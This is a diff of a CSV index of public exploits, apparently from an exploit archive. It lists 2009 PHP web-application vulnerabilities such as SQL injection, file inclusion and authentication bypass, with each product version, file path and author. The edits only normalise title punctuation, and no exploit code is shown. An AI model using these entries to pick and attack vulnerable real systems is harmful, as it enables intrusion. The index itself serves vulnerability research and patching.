8915,platforms/php/webapps/8915.pl,"S-CMS 2.0b3 - 'Username' Blind SQL Injection",2009-06-09,YEnH4ckEr,php,webapps,0 8917,platforms/php/webapps/8917.txt,"mrcgiguy the ticket system 2.0 PHP - Multiple Vulnerabilities",2009-06-09,"ThE g0bL!N",php,webapps,0 -8918,platforms/php/webapps/8918.txt,"MRCGIGUY Hot Links - 'report.php id' SQL Injection",2009-06-09,"ThE g0bL!N",php,webapps,0 +8918,platforms/php/webapps/8918.txt,"MRCGIGUY Hot Links - 'report.php?id' SQL Injection",2009-06-09,"ThE g0bL!N",php,webapps,0 8919,platforms/php/webapps/8919.txt,"Joomla! Component com_realestatemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 8920,platforms/php/webapps/8920.txt,"Joomla! Component com_vehiclemanager 1.0 - Remote File Inclusion",2009-06-09,"Mehmet Ince",php,webapps,0 8921,platforms/php/webapps/8921.sh,"phpMyAdmin - '/scripts/setup.php' PHP Code Injection",2009-06-09,"Adrian _pagvac_ Pastor",php,webapps,0 @@ -21926,11 +21927,11 @@ id,file,description,date,author,platform,type,port 8925,platforms/php/webapps/8925.txt,"Desi Short URL Script - (Authentication Bypass) Insecure Cookie Handling",2009-06-10,N@bilX,php,webapps,0 8926,platforms/php/webapps/8926.txt,"mrcgiguy freeticket - Cookie Handling / SQL Injection",2009-06-10,"ThE g0bL!N",php,webapps,0 8927,platforms/php/webapps/8927.pl,"Open Biller 0.1 - 'Username' Blind SQL Injection",2009-06-10,YEnH4ckEr,php,webapps,0 -8928,platforms/php/webapps/8928.txt,"PHPWebThings 1.5.2 - 'help.php module' Local File Inclusion",2009-06-11,Br0ly,php,webapps,0 +8928,platforms/php/webapps/8928.txt,"PHPWebThings 1.5.2 - 'help.php?module' Local File Inclusion",2009-06-11,Br0ly,php,webapps,0 8929,platforms/php/webapps/8929.txt,"Splog 1.2 Beta - Multiple SQL Injections",2009-06-11,YEnH4ckEr,php,webapps,0 -8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 - (deleteTorrent) Delete Arbitrary File",2009-06-11,Br0ly,php,webapps,0 +8931,platforms/php/webapps/8931.txt,"TorrentVolve 1.4 - 'deleteTorrent' Delete Arbitrary File",2009-06-11,Br0ly,php,webapps,0 8932,platforms/php/webapps/8932.txt,"yogurt 0.3 - Cross-Site Scripting / SQL Injection",2009-06-11,Br0ly,php,webapps,0 -8933,platforms/php/webapps/8933.php,"Sniggabo CMS - 'article.php id' SQL Injection",2009-06-11,Lidloses_Auge,php,webapps,0 +8933,platforms/php/webapps/8933.php,"Sniggabo CMS - 'article.php?id' SQL Injection",2009-06-11,Lidloses_Auge,php,webapps,0 8935,platforms/php/webapps/8935.txt,"Zip Store Chat 4.0/5.0 - Authentication Bypass",2009-06-12,ByALBAYX,php,webapps,0 8936,platforms/php/webapps/8936.txt,"4Images 1.7.7 - Filter Bypass HTML Injection / Cross-Site Scripting",2009-06-12,Qabandi,php,webapps,0 8937,platforms/php/webapps/8937.txt,"campus virtual-lms - Cross-Site Scripting / SQL Injection",2009-06-12,Yasión,php,webapps,0 @@ -21941,20 +21942,20 @@ id,file,description,date,author,platform,type,port 8944,platforms/php/webapps/8944.txt,"Uebimiau Web-Mail 3.2.0-1.8 - Remote File / Overwrite",2009-06-12,GoLd_M,php,webapps,0 8946,platforms/php/webapps/8946.txt,"Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion",2009-06-15,ByALBAYX,php,webapps,0 8947,platforms/php/webapps/8947.txt,"impleo music Collection 2.0 - SQL Injection / Cross-Site Scripting",2009-06-15,SirGod,php,webapps,0 -8948,platforms/php/webapps/8948.txt,"Mundi Mail 0.8.2 - (top) Remote File Inclusion",2009-06-15,Br0ly,php,webapps,0 +8948,platforms/php/webapps/8948.txt,"Mundi Mail 0.8.2 - 'top' Remote File Inclusion",2009-06-15,Br0ly,php,webapps,0 8949,platforms/php/webapps/8949.txt,"SugarCRM 5.2.0e - Remote Code Execution",2009-06-15,USH,php,webapps,0 8950,platforms/php/webapps/8950.txt,"formmail 1.92 - Multiple Vulnerabilities",2009-06-15,USH,php,webapps,0 8951,platforms/php/webapps/8951.php,"DB Top Sites 1.0 - Remote Command Execution",2009-06-15,SirGod,php,webapps,0 -8952,platforms/php/webapps/8952.txt,"DB Top Sites 1.0 - 'index.php u' Local File Inclusion",2009-06-15,SirGod,php,webapps,0 +8952,platforms/php/webapps/8952.txt,"DB Top Sites 1.0 - 'index.php?u' Local File Inclusion",2009-06-15,SirGod,php,webapps,0 8953,platforms/php/webapps/8953.txt,"elvin bts 1.2.0 - Multiple Vulnerabilities",2009-06-15,SirGod,php,webapps,0 8954,platforms/php/webapps/8954.txt,"adaptweb 0.9.2 - Local File Inclusion / SQL Injection",2009-06-15,SirGod,php,webapps,0 8956,platforms/php/webapps/8956.htm,"Evernew Free Joke Script 1.2 - Remote Change Password Exploit",2009-06-15,Hakxer,php,webapps,0 8958,platforms/php/webapps/8958.txt,"TorrentTrader Classic 1.09 - Multiple Vulnerabilities",2009-06-15,waraxe,php,webapps,0 8959,platforms/php/webapps/8959.pl,"Joomla! Component com_iJoomla_rss - Blind SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0 8961,platforms/php/webapps/8961.txt,"WordPress Plugin Photoracer 1.0 - 'id' SQL Injection",2009-06-15,Kacper,php,webapps,0 -8962,platforms/php/webapps/8962.txt,"PHPCollegeExchange 0.1.5c - 'listing_view.php itemnr' SQL Injection",2009-06-15,SirGod,php,webapps,0 +8962,platforms/php/webapps/8962.txt,"PHPCollegeExchange 0.1.5c - 'listing_view.php?itemnr' SQL Injection",2009-06-15,SirGod,php,webapps,0 8965,platforms/php/webapps/8965.txt,"vBulletin Radio and TV Player AddOn - HTML Injection",2009-06-15,d3v1l,php,webapps,0 -8966,platforms/php/webapps/8966.txt,"PHPortal 1 - 'topicler.php id' SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0 +8966,platforms/php/webapps/8966.txt,"PHPortal 1 - 'topicler.php?id' SQL Injection",2009-06-15,"Mehmet Ince",php,webapps,0 8967,platforms/php/webapps/8967.txt,"The Recipe Script 5 - Cross-Site Scripting",2009-06-15,"ThE g0bL!N",php,webapps,0 8968,platforms/php/webapps/8968.txt,"Joomla! Component Jumi - 'fileid' Blind SQL Injection",2009-06-15,"Chip d3 bi0s",php,webapps,0 8974,platforms/php/webapps/8974.txt,"XOOPS 2.3.3 - '.htaccess' Remote File Disclosure",2009-06-16,daath,php,webapps,0 @@ -21962,7 +21963,7 @@ id,file,description,date,author,platform,type,port 8977,platforms/php/webapps/8977.txt,"TekBase All-in-One 3.1 - Multiple SQL Injections",2009-06-17,n3wb0ss,php,webapps,0 8978,platforms/php/webapps/8978.txt,"Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption (PoC)",2009-06-17,StAkeR,php,webapps,0 8979,platforms/php/webapps/8979.txt,"FretsWeb 1.2 - Multiple Local File Inclusions",2009-06-17,YEnH4ckEr,php,webapps,0 -8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 - (name) Blind SQL Injection",2009-06-17,YEnH4ckEr,php,webapps,0 +8980,platforms/php/webapps/8980.py,"FretsWeb 1.2 - 'name' Blind SQL Injection",2009-06-17,YEnH4ckEr,php,webapps,0 8981,platforms/php/webapps/8981.txt,"PHPortal 1.0 - Insecure Cookie Handling",2009-06-17,KnocKout,php,webapps,0 8984,platforms/php/webapps/8984.txt,"CMS buzz - Cross-Site Scripting / Password Change / HTML Injection",2009-06-18,"ThE g0bL!N",php,webapps,0 8987,platforms/cgi/webapps/8987.txt,"MIDAS 1.43 - (Authentication Bypass) Insecure Cookie Handling",2009-06-22,HxH,cgi,webapps,0 @@ -21976,37 +21977,37 @@ id,file,description,date,author,platform,type,port 8997,platforms/php/webapps/8997.txt,"Kasseler CMS - File Disclosure / Cross-Site Scripting",2009-06-22,S(r1pt,php,webapps,0 8998,platforms/php/webapps/8998.txt,"SourceBans 1.4.2 - Arbitrary Change Admin Email",2009-06-22,"Mr. Anonymous",php,webapps,0 8999,platforms/php/webapps/8999.txt,"Joomla! Component com_tickets 2.1 - 'id' SQL Injection",2009-06-22,"Chip d3 bi0s",php,webapps,0 -9000,platforms/php/webapps/9000.txt,"RS-CMS 2.1 - (key) SQL Injection",2009-06-22,Mr.tro0oqy,php,webapps,0 +9000,platforms/php/webapps/9000.txt,"RS-CMS 2.1 - 'key' SQL Injection",2009-06-22,Mr.tro0oqy,php,webapps,0 9001,platforms/php/webapps/9001.php,"MyBB 1.4.6 - Remote Code Execution",2009-06-22,The:Paradox,php,webapps,0 9004,platforms/php/webapps/9004.txt,"Zen Cart 1.3.8 - Remote Code Execution",2009-06-23,BlackH,php,webapps,0 9005,platforms/php/webapps/9005.py,"Zen Cart 1.3.8 - SQL Execution Exploit",2009-06-23,BlackH,php,webapps,0 9008,platforms/php/webapps/9008.txt,"phpCollegeExchange 0.1.5c - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-06-23,CraCkEr,php,webapps,0 9009,platforms/php/webapps/9009.txt,"BASE 1.2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-06-24,"Tim Medin",php,webapps,0 -9010,platforms/php/webapps/9010.txt,"Glossword 1.8.11 - 'index.php x' Local File Inclusion",2009-06-24,t0fx,php,webapps,0 +9010,platforms/php/webapps/9010.txt,"Glossword 1.8.11 - 'index.php?x' Local File Inclusion",2009-06-24,t0fx,php,webapps,0 9011,platforms/php/webapps/9011.txt,"Joomla! Component com_pinboard - Arbitrary File Upload",2009-06-24,ViRuSMaN,php,webapps,0 9012,platforms/php/webapps/9012.txt,"Tribiq CMS 5.0.12c - Cross-Site Scripting / Local File Inclusion",2009-06-24,CraCkEr,php,webapps,0 -9014,platforms/php/webapps/9014.txt,"PHPEcho CMS 2.0-rc3 - (forum) Cross-Site Scripting Cookie Stealing / Blind",2009-06-24,JosS,php,webapps,0 -9015,platforms/php/webapps/9015.txt,"LightOpenCMS 0.1 - 'smarty.php cwd' Local File Inclusion",2009-06-24,JosS,php,webapps,0 +9014,platforms/php/webapps/9014.txt,"PHPEcho CMS 2.0-rc3 - 'forum' Cross-Site Scripting Cookie Stealing / Blind SQL Injection",2009-06-24,JosS,php,webapps,0 +9015,platforms/php/webapps/9015.txt,"LightOpenCMS 0.1 - 'smarty.php?cwd' Local File Inclusion",2009-06-24,JosS,php,webapps,0 9016,platforms/php/webapps/9016.txt,"Joomla! Component com_amocourse - 'catid' SQL Injection",2009-06-24,"Chip d3 bi0s",php,webapps,0 -9017,platforms/php/webapps/9017.txt,"Joomla! Component com_pinboard - (task) SQL Injection",2009-06-25,Stack,php,webapps,0 +9017,platforms/php/webapps/9017.txt,"Joomla! Component com_pinboard - 'task' SQL Injection",2009-06-25,Stack,php,webapps,0 9018,platforms/php/webapps/9018.txt,"MyFusion 6b - settings[locale] Local File Inclusion",2009-06-25,CraCkEr,php,webapps,0 9019,platforms/php/webapps/9019.txt,"AlumniServer 1.0.1 - Authentication Bypass",2009-06-25,YEnH4ckEr,php,webapps,0 -9020,platforms/php/webapps/9020.py,"AlumniServer 1.0.1 - (resetpwemail) Blind SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0 +9020,platforms/php/webapps/9020.py,"AlumniServer 1.0.1 - 'resetpwemail' Blind SQL Injection",2009-06-25,YEnH4ckEr,php,webapps,0 9021,platforms/php/webapps/9021.txt,"MD-Pro 1.083.x - Survey Module (pollID) Blind SQL Injection",2009-06-25,XaDoS,php,webapps,0 9022,platforms/php/webapps/9022.txt,"Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting",2009-06-26,HxH,php,webapps,0 9023,platforms/php/webapps/9023.txt,"PHP-Address Book 4.0.x - Multiple SQL Injections",2009-06-26,YEnH4ckEr,php,webapps,0 9024,platforms/php/webapps/9024.txt,"ForumPal FE 1.1 - Authentication Bypass",2009-06-26,"ThE g0bL!N",php,webapps,0 9025,platforms/php/webapps/9025.txt,"Mega File Manager 1.0 - 'index.php' Local File Inclusion",2009-06-26,SirGod,php,webapps,0 9026,platforms/php/webapps/9026.txt,"WHOISCART - (Authentication Bypass) Information Disclosure",2009-06-29,SecurityRules,php,webapps,0 -9027,platforms/php/webapps/9027.txt,"Messages Library 2.0 - 'cat.php CatID' SQL Injection",2009-06-29,SecurityRules,php,webapps,0 +9027,platforms/php/webapps/9027.txt,"Messages Library 2.0 - 'cat.php?CatID' SQL Injection",2009-06-29,SecurityRules,php,webapps,0 9028,platforms/php/webapps/9028.txt,"Joomla! Component com_php - 'id' Blind SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps,0 -9030,platforms/php/webapps/9030.txt,"Joomla! Component com_K2 -q 1.0.1b - (category) SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps,0 +9030,platforms/php/webapps/9030.txt,"Joomla! Component com_K2 -q 1.0.1b - 'category' SQL Injection",2009-06-29,"Chip d3 bi0s",php,webapps,0 9032,platforms/php/webapps/9032.txt,"osTicket 1.6 RC4 - Admin Login Blind SQL Injection",2009-06-29,"Adam Baldwin",php,webapps,0 -9035,platforms/php/webapps/9035.txt,"Almnzm - (COOKIE: customer) SQL Injection",2009-06-29,Qabandi,php,webapps,0 -9036,platforms/php/webapps/9036.txt,"PHP-Sugar 0.80 - 'index.php t' Local File Inclusion",2009-06-29,ahmadbady,php,webapps,0 -9037,platforms/php/webapps/9037.txt,"Clicknet CMS 2.1 - (side) Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 -9040,platforms/php/webapps/9040.txt,"Joomla! Component com_bookflip - (book_id) SQL Injection",2009-06-29,boom3rang,php,webapps,0 -9041,platforms/php/webapps/9041.txt,"Audio Article Directory - (file) Remote File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 +9035,platforms/php/webapps/9035.txt,"Almnzm - 'COOKIE: customer' SQL Injection",2009-06-29,Qabandi,php,webapps,0 +9036,platforms/php/webapps/9036.txt,"PHP-Sugar 0.80 - 'index.php?t' Local File Inclusion",2009-06-29,ahmadbady,php,webapps,0 +9037,platforms/php/webapps/9037.txt,"Clicknet CMS 2.1 - 'side' Arbitrary File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 +9040,platforms/php/webapps/9040.txt,"Joomla! Component com_bookflip - 'book_id' SQL Injection",2009-06-29,boom3rang,php,webapps,0 +9041,platforms/php/webapps/9041.txt,"Audio Article Directory - 'file' Remote File Disclosure",2009-06-29,"ThE g0bL!N",php,webapps,0 9042,platforms/php/webapps/9042.pl,"NEWSolved 1.1.6 - 'login grabber' Multiple SQL Injections",2009-06-29,jmp-esp,php,webapps,0 9043,platforms/php/webapps/9043.txt,"WordPress Plugin DM Albums 1.9.2 - Remote File Inclusion",2009-06-29,Septemb0x,php,webapps,0 9044,platforms/php/webapps/9044.txt,"dm FileManager 3.9.4 - Remote File Inclusion",2009-06-29,Septemb0x,php,webapps,0 @@ -22028,7 +22029,7 @@ id,file,description,date,author,platform,type,port 9069,platforms/php/webapps/9069.txt,"CMS chainuk 1.2 - Multiple Vulnerabilities",2009-07-01,eLwaux,php,webapps,0 9073,platforms/php/webapps/9073.php,"YourTube 2.0 - Arbitrary Database Disclosure",2009-07-02,"Security Code Team",php,webapps,0 9074,platforms/cgi/webapps/9074.txt,"Sourcefire 3D Sensor & Defense Center 4.8.x - Privilege Escalation",2009-07-02,"Gregory Duchemin",cgi,webapps,0 -9075,platforms/php/webapps/9075.txt,"AdminLog 0.5 - (valid_login) Authentication Bypass",2009-07-02,SirGod,php,webapps,0 +9075,platforms/php/webapps/9075.txt,"AdminLog 0.5 - 'valid_login' Authentication Bypass",2009-07-02,SirGod,php,webapps,0 9076,platforms/php/webapps/9076.php,"Almnzm 2.0 - Blind SQL Injection",2009-07-02,Qabandi,php,webapps,0 9077,platforms/php/webapps/9077.txt,"ConPresso 3.4.8 - 'detail.php' Blind SQL Injection",2009-07-02,tmh,php,webapps,0 9079,platforms/php/webapps/9079.txt,"Opial 1.0 - Authentication Bypass",2009-07-02,Moudi,php,webapps,0 @@ -22037,21 +22038,21 @@ id,file,description,date,author,platform,type,port 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps,0 9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password",2009-07-09,rEcruit,php,webapps,0 9088,platforms/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0 -9089,platforms/php/webapps/9089.txt,"ClearContent - '/image.php url' Local/Remote File Inclusion",2009-07-09,MizoZ,php,webapps,0 +9089,platforms/php/webapps/9089.txt,"ClearContent - '/image.php?url' Local/Remote File Inclusion",2009-07-09,MizoZ,php,webapps,0 9091,platforms/php/webapps/9091.php,"Mlffat 2.2 - Blind SQL Injection",2009-07-09,Qabandi,php,webapps,0 9092,platforms/php/webapps/9092.txt,"webasyst shop-script - Blind SQL Injection / Cross-Site Scripting",2009-07-09,Vrs-hCk,php,webapps,0 9094,platforms/php/webapps/9094.txt,"EasyVillaRentalSite - 'id' SQL Injection",2009-07-09,BazOka-HaCkEr,php,webapps,0 9095,platforms/php/webapps/9095.txt,"TalkBack 2.3.14 - Multiple Vulnerabilities",2009-07-09,JIKO,php,webapps,0 9098,platforms/php/webapps/9098.txt,"Siteframe CMS 3.2.x - SQL Injection / phpinfo()",2009-07-09,NoGe,php,webapps,0 -9099,platforms/php/webapps/9099.pl,"Universe CMS 1.0.6 - 'vnews.php id' SQL Injection",2009-07-09,Mr.tro0oqy,php,webapps,0 +9099,platforms/php/webapps/9099.pl,"Universe CMS 1.0.6 - 'vnews.php?id' SQL Injection",2009-07-09,Mr.tro0oqy,php,webapps,0 9101,platforms/php/webapps/9101.txt,"phpbms 0.96 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 9103,platforms/php/webapps/9103.txt,"gencms 2006 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0 9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,php,webapps,0 -9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - 'login.php user' Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0 +9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - 'login.php?user' Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0 9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution",2009-07-10,darkjoker,php,webapps,0 9110,platforms/php/webapps/9110.txt,"WordPress Core / MU / Plugins - '/admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0 9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0 -9112,platforms/php/webapps/9112.txt,"Joomla! Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0 +9112,platforms/php/webapps/9112.txt,"Joomla! Component com_propertylab - 'auction_id' SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0 9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps,0 9118,platforms/php/webapps/9118.txt,"ebay clone 2009 - Cross-Site Scripting / Blind SQL Injection",2009-07-10,Moudi,php,webapps,0 9119,platforms/php/webapps/9119.txt,"LionWiki - 'index.php' Local File Inclusion",2009-07-10,MoDaMeR,php,webapps,0 @@ -22069,9 +22070,9 @@ id,file,description,date,author,platform,type,port 9145,platforms/php/webapps/9145.php,"Traidnt UP 2.0 - Blind SQL Injection",2009-07-14,Qabandi,php,webapps,0 9150,platforms/php/webapps/9150.txt,"WordPress Plugin My Category Order 2.8 - SQL Injection",2009-07-15,"Manh Luat",php,webapps,0 9151,platforms/php/webapps/9151.txt,"ILIAS Lms 3.9.9/3.10.7 - Arbitrary Edition/Info Disclosure Vulnerabilities",2009-07-15,YEnH4ckEr,php,webapps,0 -9153,platforms/php/webapps/9153.txt,"Admin News Tools 2.5 - (fichier) Remote File Disclosure",2009-07-15,Securitylab.ir,php,webapps,0 +9153,platforms/php/webapps/9153.txt,"Admin News Tools 2.5 - 'fichier' Remote File Disclosure",2009-07-15,Securitylab.ir,php,webapps,0 9154,platforms/php/webapps/9154.js,"ZenPhoto 1.2.5 - Completely Blind SQL Injection",2009-07-15,petros,php,webapps,0 -9155,platforms/php/webapps/9155.txt,"PHPGenealogy 2.0 - (DataDirectory) Remote File Inclusion",2009-07-15,"Khashayar Fereidani",php,webapps,0 +9155,platforms/php/webapps/9155.txt,"PHPGenealogy 2.0 - 'DataDirectory' Remote File Inclusion",2009-07-15,"Khashayar Fereidani",php,webapps,0 9156,platforms/php/webapps/9156.py,"Greenwood Content Manager 0.3.2 - Local File Inclusion",2009-07-15,"Khashayar Fereidani",php,webapps,0 9159,platforms/php/webapps/9159.php,"Infinity 2.0.5 - Arbitrary Create Admin Exploit",2009-07-15,Qabandi,php,webapps,0 9161,platforms/php/webapps/9161.txt,"Admin News Tools - Remote Contents Change",2009-07-15,Securitylab.ir,php,webapps,0 @@ -22079,17 +22080,17 @@ id,file,description,date,author,platform,type,port 9164,platforms/php/webapps/9164.txt,"webLeague 2.2.0 - 'install.php' Remote Change Password Exploit",2009-07-16,TiGeR-Dz,php,webapps,0 9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - Authentication Bypass",2009-07-16,ka0x,php,webapps,0 9166,platforms/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (CRSF)",2009-07-16,petros,php,webapps,0 -9171,platforms/php/webapps/9171.txt,"VS PANEL 7.5.5 - 'results.php Cat_ID' SQL Injection",2009-07-16,C0D3R-Dz,php,webapps,0 +9171,platforms/php/webapps/9171.txt,"VS PANEL 7.5.5 - 'results.php?Cat_ID' SQL Injection",2009-07-16,C0D3R-Dz,php,webapps,0 9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - 'x' Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0 9176,platforms/php/webapps/9176.txt,"dB Masters MultiMedia's Content Manager 4.5 - SQL Injection",2009-07-16,NoGe,php,webapps,0 9179,platforms/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion",2009-07-17,JIKO,php,webapps,0 -9180,platforms/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 - (entry) SQL Injection",2009-07-17,JIKO,php,webapps,0 +9180,platforms/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 - 'entry' SQL Injection",2009-07-17,JIKO,php,webapps,0 9182,platforms/php/webapps/9182.txt,"AJOX Poll - 'managepoll.php' Authentication Bypass",2009-07-17,SirGod,php,webapps,0 9183,platforms/php/webapps/9183.txt,"Battle Blog 1.25 - Authentication Bypass / SQL Injection / HTML Injection",2009-07-17,$qL_DoCt0r,php,webapps,0 9184,platforms/php/webapps/9184.txt,"Ger Versluis 2000 5.5 24 - 'SITE_fiche.php' SQL Injection",2009-07-17,DeCo017,php,webapps,0 9185,platforms/php/webapps/9185.txt,"good/bad vote - Cross-Site Scripting / Local File Inclusion",2009-07-17,Moudi,php,webapps,0 9187,platforms/php/webapps/9187.txt,"Joomla! Component Jobline 1.3.1 - Blind SQL Injection",2009-07-17,ManhLuat93,php,webapps,0 -9193,platforms/php/webapps/9193.pl,"WebVision 2.1 - 'news.php n' SQL Injection",2009-07-17,Mr.tro0oqy,php,webapps,0 +9193,platforms/php/webapps/9193.pl,"WebVision 2.1 - 'news.php?n' SQL Injection",2009-07-17,Mr.tro0oqy,php,webapps,0 9194,platforms/php/webapps/9194.txt,"radbids gold 4.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9195,platforms/php/webapps/9195.txt,"radlance gold 7.5 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 9196,platforms/php/webapps/9196.txt,"radnics gold 5.0 - Multiple Vulnerabilities",2009-07-17,Moudi,php,webapps,0 @@ -22098,20 +22099,20 @@ id,file,description,date,author,platform,type,port 9204,platforms/php/webapps/9204.txt,"MiniCWB 2.3.0 - 'lang' Remote File Inclusion",2009-07-20,NoGe,php,webapps,0 9205,platforms/php/webapps/9205.txt,"mcshoutbox 1.1 - SQL Injection / Cross-Site Scripting / shell",2009-07-20,SirGod,php,webapps,0 9211,platforms/php/webapps/9211.txt,"Alibaba-clone CMS - SQL Injection / Blind SQL Injection",2009-07-20,"599eme Man",php,webapps,0 -9217,platforms/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces - (lid) SQL Injection",2009-07-20,Vrs-hCk,php,webapps,0 +9217,platforms/php/webapps/9217.txt,"E-Xoopport 3.1 Module MyAnnonces - 'lid' SQL Injection",2009-07-20,Vrs-hCk,php,webapps,0 9219,platforms/php/webapps/9219.txt,"powerUpload 2.4 - (Authentication Bypass) Insecure Cookie Handling",2009-07-20,InjEctOr5,php,webapps,0 9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 - Authentication Bypass",2009-07-21,n3w7u,php,webapps,0 9226,platforms/php/webapps/9226.txt,"phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection",2009-07-21,Moudi,php,webapps,0 -9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script - (url) Local File Disclosure",2009-07-21,Moudi,php,webapps,0 +9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script - 'url' Local File Disclosure",2009-07-21,Moudi,php,webapps,0 9231,platforms/php/webapps/9231.txt,"Phorum 5.2.11 - Persistent Cross-Site Scripting",2009-07-22,Crashfr,php,webapps,0 9235,platforms/php/webapps/9235.php,"e107 Plugin my_gallery 2.4.1 - 'readfile()' Local File Disclosure",2009-07-23,NoGe,php,webapps,0 9236,platforms/php/webapps/9236.txt,"Groone's GLink ORGanizer 2.1 - 'cat' Blind SQL Injection",2009-07-23,"599eme Man",php,webapps,0 9237,platforms/php/webapps/9237.txt,"AWCM 2.1 - Local File Inclusion / Authentication Bypass",2009-07-23,SwEET-DeViL,php,webapps,0 -9238,platforms/php/webapps/9238.txt,"Joomla! Component com_Joomlaoads - (packageId) SQL Injection",2009-07-23,Mr.tro0oqy,php,webapps,0 +9238,platforms/php/webapps/9238.txt,"Joomla! Component com_Joomlaoads - 'packageId' SQL Injection",2009-07-23,Mr.tro0oqy,php,webapps,0 9239,platforms/php/webapps/9239.txt,"PHP Melody 1.5.3 - Arbitrary File Upload Injection",2009-07-23,"Chip d3 bi0s",php,webapps,0 9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - SQL Injection / Cross-Site Scripting",2009-07-24,Moudi,php,webapps,0 9244,platforms/php/webapps/9244.txt,"Joomla! Extension UIajaxIM 1.1 - JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0 -9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - 'index.php idAuthor' SQL Injection",2009-07-24,NoGe,php,webapps,0 +9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - 'index.php?idAuthor' SQL Injection",2009-07-24,NoGe,php,webapps,0 9248,platforms/php/webapps/9248.txt,"SaphpLesson 4.0 - Authentication Bypass",2009-07-24,SwEET-DeViL,php,webapps,0 9249,platforms/php/webapps/9249.txt,"XOOPS Celepar Module Qas - 'codigo' SQL Injection",2009-07-24,s4r4d0,php,webapps,0 9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - 'url' Cross-Site Scripting",2009-07-24,superfreakaz0rz,php,webapps,0 @@ -22120,7 +22121,7 @@ id,file,description,date,author,platform,type,port 9254,platforms/php/webapps/9254.txt,"PHP Live! 3.2.2 - 'questid' SQL Injection (2)",2009-07-24,skys,php,webapps,0 9255,platforms/php/webapps/9255.txt,"Clip Bucket 1.7.1 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 9256,platforms/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0 -9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 - (file) Remote File Disclosure",2009-07-24,Qabandi,php,webapps,0 +9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 - 'file' Remote File Disclosure",2009-07-24,Qabandi,php,webapps,0 9258,platforms/php/webapps/9258.txt,"Joomla! Component Almond Classifieds com_aclassf 7.5 - Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0 9259,platforms/php/webapps/9259.txt,"almond Classifieds ads - Blind SQL Injection / Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 9260,platforms/php/webapps/9260.txt,"skadate dating - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-07-27,Moudi,php,webapps,0 @@ -22130,7 +22131,7 @@ id,file,description,date,author,platform,type,port 9266,platforms/php/webapps/9266.txt,"iwiccle 1.01 - Local File Inclusion / SQL Injection",2009-07-27,SirGod,php,webapps,0 9267,platforms/php/webapps/9267.txt,"VS PANEL 7.5.5 - 'Cat_ID' SQL Injection",2009-07-27,octopos,php,webapps,0 9269,platforms/php/webapps/9269.txt,"PHP Paid 4 Mail Script - 'home.php' Remote File Inclusion",2009-07-27,int_main();,php,webapps,0 -9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - (s) SQL Injection",2009-07-27,MizoZ,php,webapps,0 +9270,platforms/php/webapps/9270.txt,"Super Mod System 3.0 - 's' SQL Injection",2009-07-27,MizoZ,php,webapps,0 